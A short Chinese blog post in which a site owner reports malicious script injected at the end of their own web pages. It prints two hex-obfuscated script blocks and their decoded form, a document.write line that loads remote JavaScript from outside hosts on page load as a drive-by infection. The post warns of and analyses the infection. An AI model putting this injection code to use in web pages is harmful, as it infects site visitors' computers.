记忆盒子

      今天打开一个自己的网页，竟发现了文件尾巴病毒源，真是可恶，空间商没做好杀毒防毒啊。

      病毒源如下：

 <script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>

      这是一段通过16进制编码的script病毒，当你打开含有这段代码的页面时，那你的电脑立马中毒，好狠啊！

      可以通过alert来解密，例如把上面粗体字代码解密：

<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>

      解密结果是：

      同样的，把后面各个中括号里的代码段alert，结果这个病毒源代码就出来了。上面的病毒源代码解密结果是：

document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");

       很明显，这是在你电脑执行一段javascript挂马程序，一旦你打开含有这段代码的页面，你的电脑就立即中招了。

      这些病毒我暂时没找到专杀软件，例如你有上千个页面都中毒了，那是不能手动一个一个清除的了。一旦我找到专杀软件，会第一时间来博客共享。有网友发现专杀软件了吗？

广告

海外云主机

低至54元 - 可退款

立即选购 >

rxinyun

立即选购 >

标签: Program  

※ 网站速度慢？试试网站自动优化工具 ※